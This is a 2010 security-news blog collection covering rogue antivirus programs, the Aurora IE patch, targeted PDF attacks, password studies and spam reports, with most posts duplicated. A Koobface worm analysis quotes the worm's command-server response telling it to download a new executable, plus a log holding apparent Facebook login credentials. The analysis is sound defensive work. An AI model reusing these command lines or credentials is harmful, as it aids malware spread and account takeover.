Salesmen Are Not My Friends
I dislike salesmen. The look on their faces irks me when I can feel the dollars flicking in their eyes. I hate it when my car insurance company ask if i want to get home insurance as well. I do not like it when my credit card company tries to sell me a great new insurance product. In general, I hate to be a victim of cross selling.
Malware authors are just like salesmen. They cross-sell as well. A fake AV tried to do the same to me. Besides offering great AV protection, it wants me to get some useful codecs so that I can watch all my legit DVDrips. Thus, someone decided that in order to get me to install their codecs, he/she will have to terminate all processes related to media players.
Terminating Media Players
In addition to the above, the malware also terminates different kinds of common applications because I need to update my AntiVirus to get them to work.
Update My AV Please
Eventually, I ended up with a useless machine that will not play my movies nor launch common applications. Cross selling is bad for computer users! Using Whois, I have confirmed that one russian salesman named ‘Alexey’, has been behind all these.
Malware authors are just like salesmen. They cross-sell as well. A fake AV tried to do the same to me. Besides offering great AV protection, it wants me to get some useful codecs so that I can watch all my legit DVDrips. Thus, someone decided that in order to get me to install their codecs, he/she will have to terminate all processes related to media players.
Terminating Media Players
In addition to the above, the malware also terminates different kinds of common applications because I need to update my AntiVirus to get them to work.
Update My AV Please
Eventually, I ended up with a useless machine that will not play my movies nor launch common applications. Cross selling is bad for computer users! Using Whois, I have confirmed that one russian salesman named ‘Alexey’, has been behind all these.
Dirty jokes by mobile phone
The Danwei web site (Chinese media, advertising, and urban life) is carrying a rippingly funny blog piece by Alice Xin Liu about a recent Chinese government program that would have China Mobile monitor mobile telephone text transmissions for conversations of a sexual nature. Offenders’ (messaging) service would be cut off until they wrote a “self-criticism.”
Xin Lilu said bloggers in China are having a ball with the idea that the government is trying to censor dirty jokes, which apparently are a significant part of the culture of Chinese people (as if they were any different than the rest of us).
The Chinese language, however, is structured in such a way that machine filtering encounters even more complexity than it does in other languages.
“Similar to filtering for the Internet, dirty phrases are targeted, but with the make up of Chinese sentences, two completely unrelated characters could be strung together to make something a lot ruder,” she says.
She said that one student blogged that after he returned from dinner at a friend’s home, he sent the text message to his buddy: “you mom’s stewed post [pork?] is excellent.” The next day he couldn’t send text messages.
There is a Chinese euphemism “meat stick,” but you can read Xin Lilu’s original blog post for that discussion.
Dirty jokes are part of the fabric of life she concludes. “…sex is a kind of entertainment. Furthermore, it’s quite important as a form [of] entertainment.”
Thank you Alice.
Blog piece here.
New York Times story "China to Scan Text Messages to Spot ‘Unhealthy Content’" here.
Xin Lilu said bloggers in China are having a ball with the idea that the government is trying to censor dirty jokes, which apparently are a significant part of the culture of Chinese people (as if they were any different than the rest of us).
The Chinese language, however, is structured in such a way that machine filtering encounters even more complexity than it does in other languages.
“Similar to filtering for the Internet, dirty phrases are targeted, but with the make up of Chinese sentences, two completely unrelated characters could be strung together to make something a lot ruder,” she says.
She said that one student blogged that after he returned from dinner at a friend’s home, he sent the text message to his buddy: “you mom’s stewed post [pork?] is excellent.” The next day he couldn’t send text messages.
There is a Chinese euphemism “meat stick,” but you can read Xin Lilu’s original blog post for that discussion.
Dirty jokes are part of the fabric of life she concludes. “…sex is a kind of entertainment. Furthermore, it’s quite important as a form [of] entertainment.”
Thank you Alice.
Blog piece here.
New York Times story "China to Scan Text Messages to Spot ‘Unhealthy Content’" here.
UK telecom giant Virgin Media monitoring customers’ file sharing
Virgin Media, the UK telecommunications giant that supplies TV, phone and Internet services, has begun to use deep packet inspection determine if its Internet customers are sharing music or films.
The monitoring system will check transmitted data against a database of copyrighted music and video to spot illegal file sharing.
Virgin Media said the system isn’t keeping track of IP addresses of the transmissions and the technology isn’t designed to catch illegal downloaders, but it could.
Observers have said that the system could be used to implement UK government initiatives to fight Internet piracy by sending repeat offenders warning letters then cutting off their Internet.
Story here.
Thanks Donna’s Security Flash.
The monitoring system will check transmitted data against a database of copyrighted music and video to spot illegal file sharing.
Virgin Media said the system isn’t keeping track of IP addresses of the transmissions and the technology isn’t designed to catch illegal downloaders, but it could.
Observers have said that the system could be used to implement UK government initiatives to fight Internet piracy by sending repeat offenders warning letters then cutting off their Internet.
Story here.
Thanks Donna’s Security Flash.
Report from Europe: 95 percent of email is spam
The European Network and Information Security Agency (ENISA) has released a report that says 95 percent of all email is now spam.
The report was based on surveying last year of email traffic by about 100 service providers in 30 countries.
ENISA Executive Director Dr. Udo Helmbrecht said:
“Spam remains an unnecessary, time consuming and costly burden for Europe. Given the number of spam messages observed, I can only conclude more dedicated efforts must be undertaken.
“Email providers should be better at monitoring spam and identifying the source. Policy-makers and regulatory authorities should clarify the conflicts between spam-filtering, privacy, and obligation to deliver.”
ENISA survey Here.
The report was based on surveying last year of email traffic by about 100 service providers in 30 countries.
ENISA Executive Director Dr. Udo Helmbrecht said:
“Spam remains an unnecessary, time consuming and costly burden for Europe. Given the number of spam messages observed, I can only conclude more dedicated efforts must be undertaken.
“Email providers should be better at monitoring spam and identifying the source. Policy-makers and regulatory authorities should clarify the conflicts between spam-filtering, privacy, and obligation to deliver.”
ENISA survey Here.
System Defender
System Defender is a rogue antispyware program, or a PC infection made to look like real security software. System Defender is a scam designed to trick people out of their money.
If your PC has been infected with System Defender, you will most likely experience the following symptoms:
System Defender is a very serious computer infection and should be removed from infected machines immediately.
If your PC has been infected with System Defender, you will most likely experience the following symptoms:
- System scans that report numerous infections, yet requires purchase of System Defender before it will remove the infections (These are fictitious scan results)
- Alerts and Pop-Up system warnings stating the PC is infected and recommend purchase of System Defender (These warnings are fake)
- Web browser redirecting to random websites (these websites are owned by cyber thieves and will further infect your PC)
- System Defender will prevent other programs from opening, stating they are infected (The programs are not infected)
System Defender is a very serious computer infection and should be removed from infected machines immediately.
ProtectSoldier
ProtectSoldier is the latest rogue antispyware program released by cyber thieves to terrorize PC users.
ProtectSoldier is phony security program that trick people into buying the software with false security warnings and system scans. By displaying false system warnings, pop-up alerts warning of infections, and system scans that state the PC has numerous infections, cyber thieves rip people off by demanding the user buy the program to remove the supposed infections.
ProtectSoldier is phony security program that trick people into buying the software with false security warnings and system scans. By displaying false system warnings, pop-up alerts warning of infections, and system scans that state the PC has numerous infections, cyber thieves rip people off by demanding the user buy the program to remove the supposed infections.
ArmorDefender
ArmorDefender is the latest rogue antispyware program released by cyber thieves to terrorize PC users.
ArmorDefender is phony security program that trick people into buying the software with false security warnings and system scans. By displaying false system warnings, pop-up alerts warning of infections, and system scans that state the PC has numerous infections, cyber thieves rip people off by demanding the user buy the program to remove the supposed infections.
ArmorDefender is phony security program that trick people into buying the software with false security warnings and system scans. By displaying false system warnings, pop-up alerts warning of infections, and system scans that state the PC has numerous infections, cyber thieves rip people off by demanding the user buy the program to remove the supposed infections.
Antivirus360
Antivirus360 is a phony antivirus program, designed to rip people off. Cyber thieves who created phony software like Antivirus360 use scare tactics to frighten people into buying the software.
Antivirus360 will show false security warnings and scan results stating the PC is infected and request payment for the software to remove the supposed infections. Antivirus360 is a complete scam and a potentially very dangerous PC infection that should be remove from infected computers.
Antivirus360 will show false security warnings and scan results stating the PC is infected and request payment for the software to remove the supposed infections. Antivirus360 is a complete scam and a potentially very dangerous PC infection that should be remove from infected computers.
Charities fight for piece of $5 million prize on Facebook
The competition is a new approach to philanthropic giving and is led by JPMorgan Chase, which throughout the competition will donate a total of $5 million to 100 charities chosen by Facebook users.
Traditionally, organizations would go through a grant process, and Chase would choose who would get its money and how much. However, late last year, Chase decided to take a different approach and put the power of choosing charities into the hands of Americans.
Chase took a database filled with 500,000 nonprofit organizations and uploaded the information on to Facebook. The bank then allowed "crowdsourcing" to choose which charities should be recognized.
The top 100 charities won $25,000 and advanced to the second round, where another vote will determine which organization will win $1 million. The five runners-up in the second round will receive $100,000 each.
Another $1 million will be given to a single charity chosen from the original group by a Chase board of directors set up to oversee this competition.
The concept of crowdsourcing corporate giving via online communities and voting was first used by American Express in 2007. In the Members Project, American Express would donate $5 million to charities submitted and selected by card members.
But Chase has taken a huge leap by moving the entire competition to Facebook.
"We wanted to find a way where we could hear from the communities we were operating in and hear what was important to them," said Chase Community Giving foundation President Kim Davis.
The philanthropic arm of the large bank donates annually $100 million to organizations around the world, Davis said. "This, for us, is very much about testing out a new way of doing corporate philanthropy for the firm."
More than a million fans have participated in the Facebook program.
Along the way, obscure charities have joined better-known ones near the top of the rankings.
Because the winners of the first round worked hard to organize their online communities, smaller charities with get-out-the-vote passion were able to compete with larger organizations.
Thus, the final 100 charities range from the large Susan G. Komen for the Cure (which claims on its Web site to be the "world's largest grassroots network of breast cancer survivors and activists") to the Feel Your Boobies foundation, started by a woman in her garage, who wants to increase awareness of breast cancer screenings in young women.
As of midday Thursday, the top vote-getting charity on the contest's Facebook page was Invisible Children Inc., a nonprofit that seeks to combat child-related violence in Africa through documentary storytelling.
Other companies are starting to pick up on crowdsourcing corporate philanthropy.
Pepsi is donating $20 million in grants this year to applicants who submit "good ideas that move communities forward," said Bonin Bough, the global director of digital and social media for Pepsico.
If someone wants to build a park in their neighborhood, that is an idea that can be submitted. "Big or small, this is about the power of ideas and the individual," Bough said.
The voting will take place on a separate site that Pepsi created. But the beverage company is providing tools -- widgets to post on Facebook pages, Twitter accounts, Tumblr blogs and other social networks -- to make it easy for applicants to campaign for votes.
David Levy is the co-founder of Social Vibe, a 2-year-old company based in Los Angeles, California, that designs marketing campaigns around social good for companies such as Kraft Foods and Coffee-Mate.
"The new role of the [advertising] agency is to figure out for the brand what users want to share," he said.
Although Levy's work may be philanthropic, he is in the marketing business. Levy does not doubt that what Chase and Pepsi are doing is partly for public relations purposes. He said, "We all have to own up to the fact that brands are in the business of making money."
Pepsi's Bough is quick to point out the unprecedented amount of money being donated to support people's ideas.
"It is not just about headlines," he said. "It is about delivering impact."
Chase points to its long history in corporate philanthropy, which started in 1804.
The company said that if it was a public-relations effort, the competition would be done differently, with advertisements in newspapers and corporate PR representatives pitching reporters.
Publicity stunt or not, representatives for the charities said they have positive feelings towards Chase.
"I think it is an amazing contest," said Jared Paul, whose A Good Idea charity is now competing for the million-dollar final prize. He believes that the contest "is going to be a great example of how organizations can spend their money and serve communities in need."
A Good Idea is a volunteer organization that provides services to the homeless and underserved youth in San Francisco, California. Paul is hosting a voting party this week with drinks, food and computers so people can log onto Facebook and vote.
“Aurora” update brief DoS
Early this afternoon Microsoft released an out-of-band security bulletin patching the vulnerabilities in Internet Explorer. The fix has been at the top of the news since the vulnerabilities it treats are believed to have led to the compromise of Google and about 30 other companies last week in what has been called the “Aurora” attack. The governments of France and Germany suggested that Internet users switch to a different browser until the vulnerability was fixed.
So, I guess, in a way, this is good news:
It means that the word obviously is out that there’s a problem and there’s a fix.
According to Wikipedia, Microsoft’s IE browser (versions 6 through 8) have a 63 percent browser market share. Apparently, every one of them hit Microsoft’s site at the same time for the update.
Update:
Minutes later it worked:
Microsoft Security Bulletin MS10-002 Here.
So, I guess, in a way, this is good news:
It means that the word obviously is out that there’s a problem and there’s a fix.
According to Wikipedia, Microsoft’s IE browser (versions 6 through 8) have a 63 percent browser market share. Apparently, every one of them hit Microsoft’s site at the same time for the update.
Update:
Minutes later it worked:
Microsoft Security Bulletin MS10-002 Here.
Thursday, January 21, 2010
Web users still don’t select good passwords
Security firm Imperva of Redwood Shores, Calif., found a unique way to gage the quality of the passwords that Web users select: they analyzed the 32 million passwords in the unencrypted file of passwords that miscreants stole from the servers of RockYou.com in December and posted on the Internet.
RockYou creates and distributes entertainment widgets that work with social networking networks.
What they found wasn’t good, according to their report.
“Key findings:
-- About 30% of users chose passwords whose length is equal or below six characters.
-- Moreover, almost 60% of users chose their passwords from a limited set of alpha-numeric characters.
-- Nearly 50% of users used names, slang words, dictionary words or trivial passwords (consecutive digits, adjacent keyboard keys, and so on).
The most common password among Rockyou.com account owners is “123456”.
They also found that things hadn’t improved much in 20 years.
“In 1990, a study of Unix password security revealed that password selection is strikingly similar to the 32 million breached passwords. Just ten years ago, hacked Hotmail passwords showed little change. This means that the users, if allowed to, will choose very weak passwords even for sites that hold their most private data. Worse, as hackers continue to rapidly adopt smarter brute force password cracking software, consumers and companies will be at greater risk.”
The unusually concise and well-written five-page Imperva report could be really handy for user education. It also contains links to other studies and articles on password security.
RockYou creates and distributes entertainment widgets that work with social networking networks.
What they found wasn’t good, according to their report.
“Key findings:
-- About 30% of users chose passwords whose length is equal or below six characters.
-- Moreover, almost 60% of users chose their passwords from a limited set of alpha-numeric characters.
-- Nearly 50% of users used names, slang words, dictionary words or trivial passwords (consecutive digits, adjacent keyboard keys, and so on).
The most common password among Rockyou.com account owners is “123456”.
They also found that things hadn’t improved much in 20 years.
“In 1990, a study of Unix password security revealed that password selection is strikingly similar to the 32 million breached passwords. Just ten years ago, hacked Hotmail passwords showed little change. This means that the users, if allowed to, will choose very weak passwords even for sites that hold their most private data. Worse, as hackers continue to rapidly adopt smarter brute force password cracking software, consumers and companies will be at greater risk.”
The unusually concise and well-written five-page Imperva report could be really handy for user education. It also contains links to other studies and articles on password security.
Targeted Attack using "Operation Aurora" as the lure
Now here's an interesting turn of events.
In the middle of all the attention to the "Operation Aurora" attacks, we're now seeing new targeted attacks that are using this very event as the lure to get the targets to open a malicious attachment!
Here's the email we saw:
The attachment Chinese cyberattack.pdf (md5: 238ecf8c0aee8bfd216cf3cad5d82448) is a PDF file which exploits the CVE-2009-4324 vulnerability in Adobe Reader (again, this is the one which was patched last week).
The exploit drops and runs a backdoor called Acrobat.exe (md5: 72170fc42ae1ca8a838843a55e293435).
In the middle of all the attention to the "Operation Aurora" attacks, we're now seeing new targeted attacks that are using this very event as the lure to get the targets to open a malicious attachment!
Here's the email we saw:
The attachment Chinese cyberattack.pdf (md5: 238ecf8c0aee8bfd216cf3cad5d82448) is a PDF file which exploits the CVE-2009-4324 vulnerability in Adobe Reader (again, this is the one which was patched last week).
The exploit drops and runs a backdoor called Acrobat.exe (md5: 72170fc42ae1ca8a838843a55e293435).
Intelligence sector hit by a targeted attack
We just blogged about a highly targeted attack against military contractors.
Now we saw one against the intelligence sector.
This attack was done with a PDF file. Again.
It was targetting the CVE-2009-4324 vulnerability. Again.
When opened, the PDF file (md5: c3079303562d4672d6c3810f91235d9b) looked like this:
What really happens in the background? Just like last time, the exploit code drops a backdoor in a file called Updater.exe (md5: 02420bb8fd8258f8afd4e01029b7a2b0).
Now, what is the document talking about? President's day? DNI Information Sharing Environment? We don't know, but a quick web search tells us that apparently there is going to be an Intelligence fair & expo in Germany next month.
Hmm. The Agenda looks awfully familiar.
Now we saw one against the intelligence sector.
This attack was done with a PDF file. Again.
It was targetting the CVE-2009-4324 vulnerability. Again.
When opened, the PDF file (md5: c3079303562d4672d6c3810f91235d9b) looked like this:
What really happens in the background? Just like last time, the exploit code drops a backdoor in a file called Updater.exe (md5: 02420bb8fd8258f8afd4e01029b7a2b0).
Now, what is the document talking about? President's day? DNI Information Sharing Environment? We don't know, but a quick web search tells us that apparently there is going to be an Intelligence fair & expo in Germany next month.
Hmm. The Agenda looks awfully familiar.
Microsoft Vulnerabilities
Microsoft is releasing an out-of-band update for their IE vulnerability.
Internet Explorer 6 is affected and is being actively exploited in the wild.
The patch will be released on the 21st, today, see Microsoft's Security Bulletin for additional details.
Also in Microsoft news, Security Advisory (979682). There's a vulnerability in Windows kernel privilege escalation.
The vulnerability affects all versions of Windows (NT 3.51 up to Windows 7), on non x64-based systems, unless 16-bit application support is disabled.
There's a workaround for disabling 16-bit support provided in Microsoft's Security Advisory.
Disabling 16-bit applications will mitigate the issue. Then, you'll be all set.
Unless you happen to use a 16-bit, 420 byte tool, from 1998, to convert hex to dec…
Some people still use such apps in 2010, for real.
Internet Explorer 6 is affected and is being actively exploited in the wild.
The patch will be released on the 21st, today, see Microsoft's Security Bulletin for additional details.
Also in Microsoft news, Security Advisory (979682). There's a vulnerability in Windows kernel privilege escalation.
The vulnerability affects all versions of Windows (NT 3.51 up to Windows 7), on non x64-based systems, unless 16-bit application support is disabled.
There's a workaround for disabling 16-bit support provided in Microsoft's Security Advisory.
Disabling 16-bit applications will mitigate the issue. Then, you'll be all set.
Unless you happen to use a 16-bit, 420 byte tool, from 1998, to convert hex to dec…
Some people still use such apps in 2010, for real.
Microsoft will patch Internet Explorer today
Microsoft has said it will issue an out-of-band patch today for critical vulnerabilities in Internet Explorer that allow remote execution of code. The company said yesterday it would not wait until the February "Patch Tuesday" to fix the vulnerabilities.
The much discussed “Aurora” vulnerabilities in IE have been held at least partially responsible for cyber attacks on Google and more then two dozen other major companies. The attacks on Google were aimed at Gmail accounts of dissidents and Google’s source code. The attacks on the other companies were aimed at stealing intellectual property.
“Microsoft Security Bulletin Advance Notification for January 2010” Here.
The much discussed “Aurora” vulnerabilities in IE have been held at least partially responsible for cyber attacks on Google and more then two dozen other major companies. The attacks on Google were aimed at Gmail accounts of dissidents and Google’s source code. The attacks on the other companies were aimed at stealing intellectual property.
“Microsoft Security Bulletin Advance Notification for January 2010” Here.
Saturday, January 16, 2010
Facebook Privacy Doesn't Really Exist
Facebook recently rolled out new privacy settings that provides additional publishing controls.
For example, Facebook users can now publish a photo to a selected list of friends.
For example, Facebook users can now publish a photo to a selected list of friends.
Haiti Earthquake: Another Rogue Rides the News
A day after the disaster that struck the Caribbean nation of Haiti, Rogue perpetrators have once again been busy with their SEO poisoning schemes. Searching for terms related to this earthquake leads to a website that installs a Rogue into the system.
It happens when an unsuspecting user searches for Haiti Earthquake details.
It happens when an unsuspecting user searches for Haiti Earthquake details.
GhostAntivirus
GhostAntivirus is a new rogue anti-virus application. It is a clone of InternetAntivirusPro.
Symantec - Spam and Phishing Landscape: January 2010
Notable highlights this month include the shift of the regions of message origin, and changes in the average size of spam messages.
Click here to download the January 2010 State of Spam Report, which highlights the following trends:
- In recent months, APJ and South America have been taking the spam share away from the traditional leaders of North America and EMEA. However, North America and EMEA together sent 57 percent of spam messages in December 2009, compared with 50 percent in November 2009.
- With respect to the average size of the messages, the 2kb – 5kb message size category increased by seven percent, while the 5kb – 10kb message size category decreased by six percent in December 2009.
- With respect to all spam categories, health and product spam have increased and now account for 52 percent of all spam messages.
Click here to download the January 2010 State of Spam Report, which highlights the following trends:
- Xmas Card, Loaded with Malware
- Your Bank Has Declared Bankruptcy
- Pills From Amazon?
- December 2009: Spam Subject Line Analysis
- “Dotted Quad” Spam Shows Sign of Eruption
- Andy Lau Talks Chinese Invoice Spam
- Symantec observed a four percent decrease from the previous month in all phishing attacks.
- Twenty-one percent of phishing URLs were generated using phishing toolkits; a decrease of 19 percent from the previous month.
- A 26 percent decrease from the previous month was observed in non-English phishing sites.
- More than 118 Web hosting services were used, which accounted for 11 percent of all phishing attacks; an increase of two percent in total Web host URLs when compared to the previous month.
New Koobface variant saves researchers time from analysis
Researchers at McAfee labs monitor Koobface activities 24/7 via custom honeypots and while reviewing one such update we noticed a variant that had debug/log features. Unlike the traditional captcha breaking technique to create new accounts, this variant of the worm converts the infected machine to a bot.
When we analysed the malware trapped in our botnet, we found that this variant of Koobface has a special feature for logging all activities carried out during the infection process in a log file . Log file is created under system root with date and time stamp for eg, C:\fb_reg20090612.log.
Activities logged by the worm:
Before every entry in the log file, it queries the thread id and process id and adds it as prefix. The worm also logs the for iexplore.exe version. It then sends a query to www.google.com to ensure that there is active internet connection in the system , this process is also logged as “check inet” in the log file. Once the acknowledgement for the query is received it confirms that the internet connection is available and logs this in the log file as “inet ok”.
This particular variant of Koobface worm contains an encrypted list of compromised websites. It selects a random URL on every execution and sends a query to check if it is a valid domain. Upon getting response from the site, it posts a request to that site again to download its latest variant.
Response received:
#BLACKLABEL
RESET
UPDATE|http://[Removed]/.sys/?getexe=fb.79.exe
EXIT
Koobface worm then requests for some more information from the compromised site like Login Name, Passwords, Birthday-Year, Birthday-Month, Birthday-day etc., which is used to login into Facebook account.
The screenshot clearly shows the request sent and response:
The worm saves the response received in another log file as below. It then tries to log on to the Facebook account using the logs. On successfull login it tries sending friend requests or scan friend lists. In case the credentials are not accepted, it terminates itself.
ThreadID:1664 ProcID: 1916 #BLACKLABEL
ThreadID:1664 ProcID: 1916 SOFT|ADD
ThreadID:1664 ProcID: 1916 LOGIN|as9:76Aipeim0fsm
ThreadID:1664 ProcID: 1916 PASS|zjnez363
ThreadID:1664 ProcID: 1916 ID|20589
ThreadID:1664 ProcID: 1916 BIRTHDAY-YEAR|1975
ThreadID:1664 ProcID: 1916 BIRTHDAY-MONTH|10
ThreadID:1664 ProcID: 1916 BIRTHDAY-DAY|15
ThreadID:1664 ProcID: 1916 LOGS|1
I have observed the same behavior in Twitter as well. I suggest not to click on links and other requests from unknown users and be careful with unusual messages from friends.
When we analysed the malware trapped in our botnet, we found that this variant of Koobface has a special feature for logging all activities carried out during the infection process in a log file . Log file is created under system root with date and time stamp for eg, C:\fb_reg20090612.log.
Activities logged by the worm:
Before every entry in the log file, it queries the thread id and process id and adds it as prefix. The worm also logs the for iexplore.exe version. It then sends a query to www.google.com to ensure that there is active internet connection in the system , this process is also logged as “check inet” in the log file. Once the acknowledgement for the query is received it confirms that the internet connection is available and logs this in the log file as “inet ok”.
This particular variant of Koobface worm contains an encrypted list of compromised websites. It selects a random URL on every execution and sends a query to check if it is a valid domain. Upon getting response from the site, it posts a request to that site again to download its latest variant.
Response received:
#BLACKLABEL
RESET
UPDATE|http://[Removed]/.sys/?getexe=fb.79.exe
EXIT
Koobface worm then requests for some more information from the compromised site like Login Name, Passwords, Birthday-Year, Birthday-Month, Birthday-day etc., which is used to login into Facebook account.
The screenshot clearly shows the request sent and response:
ThreadID:1664 ProcID: 1916 #BLACKLABEL
ThreadID:1664 ProcID: 1916 SOFT|ADD
ThreadID:1664 ProcID: 1916 LOGIN|as9:76Aipeim0fsm
ThreadID:1664 ProcID: 1916 PASS|zjnez363
ThreadID:1664 ProcID: 1916 ID|20589
ThreadID:1664 ProcID: 1916 BIRTHDAY-YEAR|1975
ThreadID:1664 ProcID: 1916 BIRTHDAY-MONTH|10
ThreadID:1664 ProcID: 1916 BIRTHDAY-DAY|15
ThreadID:1664 ProcID: 1916 LOGS|1
I have observed the same behavior in Twitter as well. I suggest not to click on links and other requests from unknown users and be careful with unusual messages from friends.
Seasons of Scams
With the holiday season behind us, cyber scammers and spammers will now be looking towards the upcoming events and worldwide happenings that they can leverage to form the next waves of online trickery. The noteworthy ones on the horizon include Valentine’s Day, tax-filing season, and the FIFA World Cup – all of which will, in all likelihood, produce their own variety of social engineering techniques, online fraud, malware, fake websites, phishing, and spam.
And some of these tactics are, unfortunately, already underway, while the events themselves are months away. According to Computer Weekly, cyber police from the UK’s Scotland Yard have already uncovered and shut down over 100 World Cup-related scams. In terms of leveraging tax season, anti-spam researchers at Trend Micro are reporting that spam messages purporting to come from the U.S. Internal Revenue Service are making the rounds, attempting to infect users with malware.
What’s the bottom line for these cyber scammers? In some cases, it’s to con you into making a bogus purchase so that the thieves reap the rewards. In others, the scams may be set up in order to get you to divulge your personal information, which in turn can be used for more widespread criminal means, including identity theft.
Identity theft is currently one of the fastest growing crimes of our time, making it an important topic to be aware – no matter the season.
Keep watching this space for regular updates on the latest scams you should be aware of. And remember, if you’d like to receive my news directly to your inbox, just subscribe to my mailing list.
And some of these tactics are, unfortunately, already underway, while the events themselves are months away. According to Computer Weekly, cyber police from the UK’s Scotland Yard have already uncovered and shut down over 100 World Cup-related scams. In terms of leveraging tax season, anti-spam researchers at Trend Micro are reporting that spam messages purporting to come from the U.S. Internal Revenue Service are making the rounds, attempting to infect users with malware.
What’s the bottom line for these cyber scammers? In some cases, it’s to con you into making a bogus purchase so that the thieves reap the rewards. In others, the scams may be set up in order to get you to divulge your personal information, which in turn can be used for more widespread criminal means, including identity theft.
Identity theft is currently one of the fastest growing crimes of our time, making it an important topic to be aware – no matter the season.
Keep watching this space for regular updates on the latest scams you should be aware of. And remember, if you’d like to receive my news directly to your inbox, just subscribe to my mailing list.
Consistent Computer Virus Malcode names
InfoSecurity, a great site for computer security news, just put up a story asking the very old question: “Why don’t AV vendors name malcode consistently.”
The lead on the piece was: “…Fortinet, Sunbelt Software, and Kaspersky all published their lists of the most prevalent malware strains for the last month of 2009, but they didn't match up, leading to an admission that users will inevitably be confused by the results.”
Great observation, sort of.
Aside from the fact that the mentioned companies are competitors, pulling in-the-wild malicious code from different continents, the answer(s) to that question:
1. The process of finding and analyzing malicious code and writing detections for it (and NOT writing false positives) moves very fast. Although AV companies have been trying to use consistent names since they drew up the 1991 Computer AntiVirus Researcher Organization’s New Virus Naming Convention, there simply isn’t enough manpower to do it 100 percent because:
2. There has been a vast explosion in the amount of malcode that is in circulation. Possibly more than 20 million new variants just last year.
InfoSecurity ran a story immediately before the story we’re discussing here, reporting PandaLabs figures for 2009. PandaLabs estimated that 55,000 new pieces of malcode were detected each day of 2009. That’s 20 million in the year -- more new malcode in one year than all the preceding 20 years. (story here.)
3. One might also ask why "users" need consistent names at all. If they want to look for information on a piece of malcode their scanner has found, well, the scanner found it and has probably given it a name, however generic. If they're infected and their scanner hasn't spotted the malcode, that means it's probably new and doesn't HAVE a name. In that case, they're going to have to send a sample to their AV company to have it put in detections. If they want to compare the detections of different AV companies, the way to do it is get a sample or an MD5 hash of the suspect file and run it in VirusTotal.
4. In the face of the onslaught of malicious code, many anti-malware companies have begun moving to behavior based detection: detecting malicious code by scanning for malicious sections of code or running it in a virtual environment to detect malicious activity. This has resulted in “generic” or “batch” names for detections.
If a piece of code under test is trying to shut down anti-malcode scanners, find other computers through directory shares, put an auto-start line in the Windows Registry and phone home the fact that it has installed itself on a specific computer – well, it probably isn’t JUST a cute little animation of a kitten. If it walks like a duck and quacks like a duck…
The lead on the piece was: “…Fortinet, Sunbelt Software, and Kaspersky all published their lists of the most prevalent malware strains for the last month of 2009, but they didn't match up, leading to an admission that users will inevitably be confused by the results.”
Great observation, sort of.
Aside from the fact that the mentioned companies are competitors, pulling in-the-wild malicious code from different continents, the answer(s) to that question:
1. The process of finding and analyzing malicious code and writing detections for it (and NOT writing false positives) moves very fast. Although AV companies have been trying to use consistent names since they drew up the 1991 Computer AntiVirus Researcher Organization’s New Virus Naming Convention, there simply isn’t enough manpower to do it 100 percent because:
2. There has been a vast explosion in the amount of malcode that is in circulation. Possibly more than 20 million new variants just last year.
InfoSecurity ran a story immediately before the story we’re discussing here, reporting PandaLabs figures for 2009. PandaLabs estimated that 55,000 new pieces of malcode were detected each day of 2009. That’s 20 million in the year -- more new malcode in one year than all the preceding 20 years. (story here.)
3. One might also ask why "users" need consistent names at all. If they want to look for information on a piece of malcode their scanner has found, well, the scanner found it and has probably given it a name, however generic. If they're infected and their scanner hasn't spotted the malcode, that means it's probably new and doesn't HAVE a name. In that case, they're going to have to send a sample to their AV company to have it put in detections. If they want to compare the detections of different AV companies, the way to do it is get a sample or an MD5 hash of the suspect file and run it in VirusTotal.
4. In the face of the onslaught of malicious code, many anti-malware companies have begun moving to behavior based detection: detecting malicious code by scanning for malicious sections of code or running it in a virtual environment to detect malicious activity. This has resulted in “generic” or “batch” names for detections.
If a piece of code under test is trying to shut down anti-malcode scanners, find other computers through directory shares, put an auto-start line in the Windows Registry and phone home the fact that it has installed itself on a specific computer – well, it probably isn’t JUST a cute little animation of a kitten. If it walks like a duck and quacks like a duck…
Wednesday, January 13, 2010
What's "Near Me Now"?!
Have you stood outside the restaurant and thought whether to go inside? Google solves this problem very easily. It has come out with yet another mind bobbling feature with Andriods and the iPhone. This Feature is known as ‘Near Me Now’. When you open google.com in your mobile like Andriods or iPhone, you see a small new addition to homepage that is ‘Near Me Now’ option below your search box.
Functionality of Near Me Now
When you open google.com your location turn into a search query automatically. This enables you to Google search and find out restaurants, coffee shops, ATM’s, banks and bars near your obtained location.
There also is an Option called ‘Explore right here’, this reveals the important places near your obtained location. This feature also provides the rating for restaurants,coffee shop and bars with distance from your present location. For showing this result Google uses customer review sites like Foursquare, Yelp and LBS(Location Based Services) application like Twitter, Facebook Status Updates and Loopt.
Release
This feature is currently available in the United States of America only. As for the Indians we still stay deprived of the pleasure of using this feature with no prospects of it releasing in the near future.
Functionality of Near Me Now
When you open google.com your location turn into a search query automatically. This enables you to Google search and find out restaurants, coffee shops, ATM’s, banks and bars near your obtained location.
There also is an Option called ‘Explore right here’, this reveals the important places near your obtained location. This feature also provides the rating for restaurants,coffee shop and bars with distance from your present location. For showing this result Google uses customer review sites like Foursquare, Yelp and LBS(Location Based Services) application like Twitter, Facebook Status Updates and Loopt.
Release
This feature is currently available in the United States of America only. As for the Indians we still stay deprived of the pleasure of using this feature with no prospects of it releasing in the near future.
Rimecud and Hamweq - birds of a feather
Following the addition of Win32/Hamweq to the MSRT last month, MMPC will continue cleaning PCs in 2010 by adding another prevalent worm, Win32/Rimecud, to this month's removal tool.
This is due not only to Win32/Rimecud's high detection numbers, which immediately follow those of Win32/Hamweq, but also to the similarities the two families share with each other.
In fact, as part of its payload, Win32/Hamweq may download Win32/Rimecud, contributing to Rimecud's suitability as the next target for MSRT.
Win32/Rimecud is a family of worms that spreads via fixed and removable drives, instant messaging programs, and P2P networks. Similar to Hamweq, it also contains backdoor functionality that allows unauthorized access to affected machines. However, compared to Hamweq, Win32/Rimecud's backdoor supports a more diverse and sophisticated set of commands, giving the remote attacker greater control of the compromised machine.
Win32/Rimecud uses a variety of obfuscators to hinder detection. These are written in C/C++/Delphi/Visual Basic and usually have virtual environment detection and anti-emulation tricks to make the malware harder to detect.
Other similarities to Win32/Hamweq's behavior include using the Recycle Bin as the target drop folder for copies of itself, injecting code into the explorer.exe process and the capability to spread via removable drives.
By looking at the similarities between the two threats we could speculate that they were created by the same author(s). Like they say: "Birds of a feather".
This is due not only to Win32/Rimecud's high detection numbers, which immediately follow those of Win32/Hamweq, but also to the similarities the two families share with each other.
In fact, as part of its payload, Win32/Hamweq may download Win32/Rimecud, contributing to Rimecud's suitability as the next target for MSRT.
